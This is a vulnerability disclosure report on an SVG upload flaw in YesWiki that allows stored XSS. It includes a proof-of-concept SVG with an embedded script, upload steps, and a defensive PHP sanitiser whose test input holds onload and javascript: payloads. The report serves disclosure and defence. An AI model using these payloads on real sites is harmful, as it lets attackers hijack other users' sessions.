Unrestricted Upload of File with Dangerous Type in yeswiki/yeswiki

Status: Valid

Reported on Oct 5th 2021


Description

File uploads are a recurring entry point for attacks: once an attacker can place a file of their choosing on the server, all that remains is to find a way to have it rendered or executed. In YesWiki the attachment upload is gated only by a configurable list of allowed extensions, and that list includes svg. An SVG file is an XML document that may contain <script> elements and event-handler attributes, so an authenticated user who can edit a page can upload an SVG carrying JavaScript; when a visitor opens the attachment, the script runs in the wiki's origin (stored XSS). https://github.com/YesWiki/yeswiki/ is therefore vulnerable to Unrestricted Upload of File with Dangerous Type, as shown below:

Proof of concept

Vulnerable variable: $allowedExtensions
Snippet (from the attachment upload handler):

    $att = new attach($this);

    // list of valid extensions, ex. array("jpeg", "xml", "bmp")
    // taken verbatim from the 'authorized-extensions' configuration key
    $allowedExtensions = array_keys($this->config['authorized-extensions']);

Because the configured authorized-extensions list contains svg, $allowedExtensions lets a .svg file through, and nothing inspects the file's content. An SVG can embed JavaScript, so the accepted upload becomes a stored XSS payload.

Payload

Create a file called poc.svg with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
<polygon id="triangle" points="100,100 100,500 500,100" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS attacks');
</script>
</svg>

Log in to YesWiki and edit the home page (http://localhost/yeswiki-doryphore/?HomePage/edit). Upload poc.svg through the attachment form and save the page. Click the rendered circle: the browser opens the SVG file directly as a document, the embedded script executes in the wiki's origin, and the alert appears. Note that the script only runs when the SVG is rendered as a top-level document (by following the attachment link); browsers do not execute scripts inside SVGs loaded via <img>, which is why the click is needed.
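The hardened counterpart to the $allowedExtensions check above, exercised against a stripped-down version of poc.svg. This is an added example, not YesWiki's code and not the fix the project merged; the function names (acceptUpload, sanitizeSvg, svgResponseHeaders) and the $config array are hypothetical, and only the authorized-extensions key is taken from the report's snippet. It requires PHP 8 with ext-dom.

```php
<?php
// Added example, not YesWiki code. The extension allow-list is still
// consulted, but an .svg upload is additionally parsed and stripped of
// active content, and the response headers keep any leftover script inert.
// acceptUpload/sanitizeSvg/svgResponseHeaders and $config are hypothetical;
// only the 'authorized-extensions' key comes from the report's snippet.
declare(strict_types=1);

/**
 * Parse an SVG and remove element/attribute types that can execute script.
 * Returns the re-serialised document, or null if it is not a well-formed SVG.
 */
function sanitizeSvg(string $svg): ?string
{
    $previous = libxml_use_internal_errors(true);
    $doc = new DOMDocument();
    // LIBXML_NONET: never fetch the external DTD named in a DOCTYPE.
    // LIBXML_NOENT is deliberately NOT set; it would expand entities (XXE).
    $loaded = $doc->loadXML($svg, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    if (!$loaded || $doc->documentElement === null
        || strtolower($doc->documentElement->localName) !== 'svg') {
        return null; // not an SVG document: reject outright
    }

    // Elements that carry script or can host arbitrary HTML.
    $forbiddenElements = ['script', 'foreignobject'];

    // Snapshot the live NodeList: removing nodes while iterating it skips siblings.
    foreach (iterator_to_array($doc->getElementsByTagName('*')) as $el) {
        if (in_array(strtolower($el->localName), $forbiddenElements, true)) {
            if ($el->parentNode !== null) {
                $el->parentNode->removeChild($el);
            }
            continue;
        }
        foreach (iterator_to_array($el->attributes) as $attr) {
            $name = strtolower($attr->localName);           // 'href' for xlink:href too
            $value = strtolower(trim($attr->value));
            $isEventHandler = str_starts_with($name, 'on');  // onload, onclick, ...
            $isScriptUrl = $name === 'href'
                && (str_starts_with($value, 'javascript:') || str_starts_with($value, 'data:'));
            if ($isEventHandler || $isScriptUrl) {
                $el->removeAttributeNode($attr);
            }
        }
    }
    return $doc->saveXML();
}

/**
 * Server-side upload gate: allow-list by extension, then special-case SVG.
 * Returns the bytes to store, or null to reject the upload.
 */
function acceptUpload(string $filename, string $contents, array $config): ?string
{
    $allowedExtensions = array_keys($config['authorized-extensions']);
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExtensions, true)) {
        return null;
    }
    if ($ext === 'svg') {
        // Safest option is to drop 'svg' from the allow-list; sanitising is the fallback.
        return sanitizeSvg($contents);
    }
    return $contents;
}

/** Headers that keep an uploaded SVG from running script in the wiki's origin. */
function svgResponseHeaders(string $filename): array
{
    return [
        'Content-Type'            => 'image/svg+xml',
        'X-Content-Type-Options'  => 'nosniff',
        // Blocks inline script even if the sanitiser missed a vector.
        'Content-Security-Policy' => "default-src 'none'; style-src 'unsafe-inline'; sandbox",
        // Direct navigation downloads the file instead of rendering it as a document.
        'Content-Disposition'     => 'attachment; filename="' . basename($filename) . '"',
    ];
}

// Constructed sample config and payload (a variant of the report's poc.svg).
$config = ['authorized-extensions' => ['png' => 'image/png', 'svg' => 'image/svg+xml']];
$poc = <<<'SVG'
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="100" height="100" onload="alert(1)">
  <circle cx="50" cy="50" r="40" fill="yellow"/>
  <script type="text/javascript">alert('XSS attacks');</script>
  <a xlink:href="javascript:alert(1)"><text y="20">x</text></a>
</svg>
SVG;

$stored = acceptUpload('poc.svg', $poc, $config);
assert($stored !== null && !str_contains($stored, '<script') && !str_contains($stored, 'onload'));
assert(acceptUpload('shell.php', '<?php echo 1;', $config) === null);
echo $stored;
```

Stripping script from SVG is a losing game in the long run (SMIL <animate>/<set> can rewrite href, <use> can pull in external content, and CSS has its own vectors), so treat the sanitiser as defence in depth: the decisive fixes are removing svg from authorized-extensions, or serving attachments with Content-Disposition: attachment and a restrictive CSP so that following the link never renders attacker-controlled markup in the wiki's origin. Embedding via <img> is unaffected by either, since browsers never run scripts in SVGs loaded that way.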

Impact

The consequences of unrestricted file upload depend on what the application does with the file and, above all, where it is stored and how it is served: outcomes range from complete system takeover (if the file can be executed server-side) to an exhausted file system or database, attacks forwarded to back-end systems, client-side attacks, or simple defacement. In this case the file is served from the wiki's own origin, so the result is stored XSS: any user who opens the attachment executes the attacker's JavaScript with that user's session, which allows session theft and actions performed as that user, including administrators.

Timeline

We have contacted a member of the yeswiki team and are waiting to hear back (8 months ago)
We have sent a third and final follow up to the yeswiki team. This report is now considered stale. (7 months ago)
Jérémy Dufraisse validated this vulnerability (3 months ago)
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jérémy Dufraisse confirmed that a fix has been merged on aa060a (3 months ago)
The fix bounty has been dropped